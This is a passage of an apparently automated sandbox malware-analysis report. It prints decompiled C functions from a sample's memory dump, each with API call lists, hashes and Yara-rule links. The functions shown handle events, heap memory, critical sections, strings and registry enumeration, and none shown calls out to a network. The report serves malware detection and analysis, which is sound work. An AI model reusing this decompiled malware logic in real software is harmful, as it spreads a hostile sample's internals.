                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: dff138f6d79a05ba56da2e49b91247ea5376d630fd0f93c885e4c41549a028de
                                                          • Instruction ID: 513ce11fe2685b0fbdc85d35025a7fe2963e390fa0e6f0308768262996f2e098
                                                          • Opcode Fuzzy Hash: dff138f6d79a05ba56da2e49b91247ea5376d630fd0f93c885e4c41549a028de
                                                          • Instruction Fuzzy Hash: 71110A76A00295AFD3148F69DC88E5E7FBAEBD03A0B050176F644DB150E7709D04D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E6840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x005e684a
                                                          0x005e684e
                                                          0x005e6863
                                                          0x005e6865
                                                          0x005e686a
                                                          0x005e6870
                                                          0x005e6872
                                                          0x005e6877
                                                          0x005e6882
                                                          0x005e6879
                                                          0x005e6879
                                                          0x005e6879
                                                          0x005e6877
                                                          0x005e6890

                                                          APIs
                                                          • memset.NTDLL ref: 005E684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 005E6863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 005E6870
                                                          • CloseHandle.KERNEL32(?), ref: 005E6882
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 7870642a90fd9990b6aff4eec99928b5779e94cdf8c2bc3eb855ffb449a1b614
                                                          • Instruction ID: cbf5a9248738d9bedde4b310c9896dbe9f9dcf3150386ca510cfd2f2607e52bc
                                                          • Opcode Fuzzy Hash: 7870642a90fd9990b6aff4eec99928b5779e94cdf8c2bc3eb855ffb449a1b614
                                                          • Instruction Fuzzy Hash: 95F030B1504348AFD2186F269CC482BBFECFBA12D9B114A6DF18281511D671A8098A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E56FA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E005E56FA(int __eax, intOrPtr _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t14 = __eax;
				__imp__(_a4);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E005EA71F(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                                          0x005e5701
                                                          0x005e5703
                                                          0x005e5709
                                                          0x005e570d
                                                          0x005e570f
                                                          0x005e570f
                                                          0x005e5711
                                                          0x005e571a
                                                          0x005e571e
                                                          0x005e5726
                                                          0x005e5735
                                                          0x005e573a
                                                          0x005e5742

                                                          APIs
                                                          • lstrlen.KERNEL32(63699BC3,00000000,750DD3B0,%]^,005E8AD8,00000000,%]^,?,63699BC3,?,%]^,63699BC3,?,%]^,63699BC3,00000005), ref: 005E5703
                                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,005E5D25), ref: 005E5726
                                                          • memset.NTDLL ref: 005E5735
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpymemset
                                                          • String ID: %]^
                                                          • API String ID: 4042389641-1107362547
                                                          • Opcode ID: 3568d2a47b063e26d9ab2bcd4a10b206a38564d5166cd75a7879bb878b83fdea
                                                          • Instruction ID: ed0662d0abe584a77865cfd9ad01e09f83a7cbd13f645e4e9dd38134129a103e
                                                          • Opcode Fuzzy Hash: 3568d2a47b063e26d9ab2bcd4a10b206a38564d5166cd75a7879bb878b83fdea
                                                          • Instruction Fuzzy Hash: 26E065B79053A267D634AABA5CCDD4F2EEDEBD43A4B100925FE8697101F520CC14C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E1B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x5ed26c; // 0x270
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x5ed2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x5ed26c; // 0x270
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x5ed238; // 0x1270000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x005e1b42
                                                          0x005e1b49
                                                          0x005e1b93
                                                          0x005e1b95
                                                          0x005e1b95
                                                          0x005e1b4d
                                                          0x005e1b53
                                                          0x005e1b58
                                                          0x005e1b5c
                                                          0x005e1b62
                                                          0x005e1b69
                                                          0x00000000
                                                          0x00000000
                                                          0x005e1b6b
                                                          0x005e1b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e1b70
                                                          0x005e1b72
                                                          0x005e1b7a
                                                          0x005e1b7d
                                                          0x005e1b7d
                                                          0x005e1b83
                                                          0x005e1b8a
                                                          0x005e1b8d
                                                          0x005e1b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(00000270,00000001,005E4F0E), ref: 005E1B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005E1B5C
                                                          • CloseHandle.KERNEL32(00000270), ref: 005E1B7D
                                                          • HeapDestroy.KERNEL32(01270000), ref: 005E1B8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 75e05bf0947af8b61ad6c72aad6d403eae18b183b222dba0bb6931e63721b515
                                                          • Instruction ID: 1988293ef950d185c0508a455928b6d81ee689ceacf7b33e1076bfb34aa8ff10
                                                          • Opcode Fuzzy Hash: 75e05bf0947af8b61ad6c72aad6d403eae18b183b222dba0bb6931e63721b515
                                                          • Instruction Fuzzy Hash: 60F08C35A0178187DB189B3AEC8CE0A3FACBB247607040210F995DB2A0EB31C849A660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E23F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E005E23F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x5ed32c; // 0x16695b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x5ed32c; // 0x16695b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x5ed030) {
					HeapFree( *0x5ed238, 0, _t8);
				}
				_t14[1] = E005E486F(_v0, _t14);
				_t11 =  *0x5ed32c; // 0x16695b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x005e23f4
                                                          0x005e23f4
                                                          0x005e23fd
                                                          0x005e240d
                                                          0x005e240d
                                                          0x005e2412
                                                          0x005e2417
                                                          0x00000000
                                                          0x00000000
                                                          0x005e2407
                                                          0x005e2407
                                                          0x005e2419
                                                          0x005e241d
                                                          0x005e242f
                                                          0x005e242f
                                                          0x005e243f
                                                          0x005e2442
                                                          0x005e2447
                                                          0x005e244b
                                                          0x005e2451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E23FD
                                                          • Sleep.KERNEL32(0000000A,?,005E5D25), ref: 005E2407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,005E5D25), ref: 005E242F
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E244B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f90c66823e95827675e2bc06bb75a570e09cba59724bd6e09c2c0c4ed4e1b97
                                                          • Instruction ID: c32e33ac2a6ba23477583d5a63593a7c744d24b8d685b3e6383a07989273e1fd
                                                          • Opcode Fuzzy Hash: 6f90c66823e95827675e2bc06bb75a570e09cba59724bd6e09c2c0c4ed4e1b97
                                                          • Instruction Fuzzy Hash: 0BF0DA716002C1DBDB1CDF6ADD8CF197BF8BB28740F048404F9C1CA2A5C720E849EA26
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E005E6702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x5ed32c; // 0x16695b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x5ed32c; // 0x16695b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x5ed32c; // 0x16695b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x5ee81a) {
					HeapFree( *0x5ed238, 0, _t10);
					_t7 =  *0x5ed32c; // 0x16695b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x005e6702
                                                          0x005e670b
                                                          0x005e671b
                                                          0x005e671b
                                                          0x005e6720
                                                          0x005e6725
                                                          0x00000000
                                                          0x00000000
                                                          0x005e6715
                                                          0x005e6715
                                                          0x005e6727
                                                          0x005e672c
                                                          0x005e6730
                                                          0x005e6743
                                                          0x005e6749
                                                          0x005e6749
                                                          0x005e6752
                                                          0x005e6754
                                                          0x005e6758
                                                          0x005e675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E670B
                                                          • Sleep.KERNEL32(0000000A,?,005E5D25), ref: 005E6715
                                                          • HeapFree.KERNEL32(00000000,?,?,005E5D25), ref: 005E6743
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E6758
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f0dcb449c5f659a7178d822b279effbdcabb068dc7aa8dda3aa8228a7b3e216
                                                          • Instruction ID: 665176b299be837d80a4ce672cec2b97862c661100b8e2a91560732035901657
                                                          • Opcode Fuzzy Hash: 6f0dcb449c5f659a7178d822b279effbdcabb068dc7aa8dda3aa8228a7b3e216
                                                          • Instruction Fuzzy Hash: 1EF0B274600280DBEB1CCB65DDDDA197BF5EB28794B049459F982CF270C630EC09EA21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EA446, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E005EA446(void* __ecx, char _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x5ed0a8(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E005EA71F(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					 *0x5ed0cc(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_t10 =  &_v12; // 0x5e3741
					_v12 = 0x104;
					_t53 =  *0x5ed0d8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E005EA734(_v28);
							goto L17;
						}
						_t24 =  &_a4; // 0x5e3741
						_t53 = E005E853F(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E005EA734(_v24);
						_v20 = _v16;
						_t47 = E005EA71F(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x5ed26c, 0) == 0x102);
				goto L16;
			}














                                                          0x005ea446
                                                          0x005ea460
                                                          0x005ea463
                                                          0x005ea466
                                                          0x005ea469
                                                          0x005ea472
                                                          0x005ea476
                                                          0x005ea550
                                                          0x005ea554
                                                          0x005ea554
                                                          0x005ea47f
                                                          0x005ea486
                                                          0x005ea48b
                                                          0x005ea490
                                                          0x005ea545
                                                          0x005ea548
                                                          0x00000000
                                                          0x005ea54e
                                                          0x005ea496
                                                          0x005ea499
                                                          0x005ea4a0
                                                          0x005ea4a3
                                                          0x005ea4aa
                                                          0x005ea4b9
                                                          0x005ea4c1
                                                          0x005ea4f9
                                                          0x005ea533
                                                          0x005ea539
                                                          0x005ea53b
                                                          0x005ea53b
                                                          0x005ea53d
                                                          0x005ea540
                                                          0x00000000
                                                          0x005ea540
                                                          0x005ea4fb
                                                          0x005ea513
                                                          0x005ea517
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005ea517
                                                          0x005ea4c6
                                                          0x005ea4d5
                                                          0x00000000
                                                          0x00000000
                                                          0x005ea4da
                                                          0x005ea4e3
                                                          0x005ea4e6
                                                          0x005ea4eb
                                                          0x005ea4f0
                                                          0x005ea4cb
                                                          0x005ea4cb
                                                          0x00000000
                                                          0x005ea4cb
                                                          0x005ea4f4
                                                          0x00000000
                                                          0x005ea4f4
                                                          0x005ea4c8
                                                          0x00000000
                                                          0x005ea519
                                                          0x005ea526
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • WaitForSingleObject.KERNEL32(00000000,00000001,?,?,?,00000000,A7^,?,?,?,?,?,005E3741,?), ref: 005EA520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeapObjectSingleWait
                                                          • String ID: A7^$A7^
                                                          • API String ID: 3050739573-2744181845
                                                          • Opcode ID: 70439558862aefff0ae20d3dc063ee0f24a4d01c51c884ef16612996643b6c15
                                                          • Instruction ID: e4dfa3bd0770d1864eeb2c7ac988e9b85e29b2c374e12c2c7a09338be49b7c54
                                                          • Opcode Fuzzy Hash: 70439558862aefff0ae20d3dc063ee0f24a4d01c51c884ef16612996643b6c15
                                                          • Instruction Fuzzy Hash: BE318B72C00259EBCF25ABB6EC888EEFEB9FF94710F204426E591B6150D2701E44DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E729A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E005E729A(void* __eax, char _a4) {

				 *0x5ed2b4 =  *0x5ed2b4 & 0x00000000;
				_push(0);
				_push("xhF");
				_push(1);
				_t1 =  &_a4; // 0x4d283a53
				_push( *_t1);
				 *0x5ed2ac = 0xc;
				L005E8D0E();
				return __eax;
			}



                                                          0x005e729a
                                                          0x005e72a1
                                                          0x005e72a3
                                                          0x005e72a8
                                                          0x005e72aa
                                                          0x005e72aa
                                                          0x005e72ae
                                                          0x005e72b8
                                                          0x005e72bd

                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001,xhF,00000000), ref: 005E72B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: DescriptorSecurity$ConvertString
                                                          • String ID: S:(M$xhF
                                                          • API String ID: 3907675253-3190673016
                                                          • Opcode ID: a233bcebd0b06ea6c24b851813832b049d08722f70796601ee78a8d2df2a88be
                                                          • Instruction ID: 73a6fb7d7099be98fe7d85a5ec4a8e00d9ce2a69fc7b8c0c0f2da5bbc3042b09
                                                          • Opcode Fuzzy Hash: a233bcebd0b06ea6c24b851813832b049d08722f70796601ee78a8d2df2a88be
                                                          • Instruction Fuzzy Hash: E9C04C7D545381AAE6299F019D86F157A76B760B05F504404B784281D0C7F69018AA39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E5AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E005E5AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E005EA71F(_t2);
				if(_t34 != 0) {
					_t30 = E005EA71F(_t28);
					if(_t30 == 0) {
						E005EA734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E005EA782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E005EA782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x005e5af1
                                                          0x005e5afb
                                                          0x005e5afd
                                                          0x005e5b03
                                                          0x005e5b03
                                                          0x005e5b0c
                                                          0x005e5b10
                                                          0x005e5b1c
                                                          0x005e5b20
                                                          0x005e5b94
                                                          0x005e5b22
                                                          0x005e5b22
                                                          0x005e5b26
                                                          0x005e5b2b
                                                          0x005e5b30
                                                          0x005e5b4a
                                                          0x005e5b39
                                                          0x005e5b39
                                                          0x005e5b3d
                                                          0x005e5b40
                                                          0x005e5b45
                                                          0x005e5b45
                                                          0x005e5b4f
                                                          0x005e5b77
                                                          0x005e5b7d
                                                          0x005e5b80
                                                          0x005e5b51
                                                          0x005e5b53
                                                          0x005e5b5b
                                                          0x005e5b66
                                                          0x005e5b6b
                                                          0x005e5b6b
                                                          0x005e5b87
                                                          0x005e5b8e
                                                          0x005e5b8f
                                                          0x005e5b8f
                                                          0x005e5b20
                                                          0x005e5b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000), ref: 005E5AFD
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                            • Part of subcall function 005EA782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,005E5B2B,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102), ref: 005EA790
                                                            • Part of subcall function 005EA782: StrChrA.SHLWAPI(?,0000003F,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005EA79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?), ref: 005E5B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 75cfe1dc71985afb455045529a7e0cb4132d4839c43d3bff687078b73bab15d5
                                                          • Instruction ID: 9afcd8491b800b7439d695dbf21cfa00ce43140c629de7853354df4cd79ef969
                                                          • Opcode Fuzzy Hash: 75cfe1dc71985afb455045529a7e0cb4132d4839c43d3bff687078b73bab15d5
                                                          • Instruction Fuzzy Hash: CF21F376400296EBCB1AAF76CC88A9E7FBDFF56384B144050F9869F201E730D90087E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E45C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E45C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E005EA71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x005e45db
                                                          0x005e45df
                                                          0x005e45e9
                                                          0x005e45ee
                                                          0x005e45f3
                                                          0x005e45f5
                                                          0x005e45fd
                                                          0x005e4602
                                                          0x005e4610
                                                          0x005e4615
                                                          0x005e461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0166935C,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45D6
                                                          • lstrlenW.KERNEL32(005E8D93,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45DD
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,005E8D93,004F0053,0166935C,?,?,?,?,?,?,005E523E), ref: 005E45FD
                                                          • memcpy.NTDLL(74B069A0,005E8D93,00000002,00000000,004F0053,74B069A0,?,?,005E8D93,004F0053,0166935C), ref: 005E4610
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 8eca6dde3862bd89a5aede92cfb69ff01c33e6b1b50a431c8e4553409cf2339c
                                                          • Instruction ID: fcfd69caa4351d7e82723d9e6011738f90fe0701f03e1eed509aeaf73a9d7f8a
                                                          • Opcode Fuzzy Hash: 8eca6dde3862bd89a5aede92cfb69ff01c33e6b1b50a431c8e4553409cf2339c
                                                          • Instruction Fuzzy Hash: 36F04976900119BBCF15EFA9CC89C8F7FACEF493947114062FA08D7202E731EA149BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                          • lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
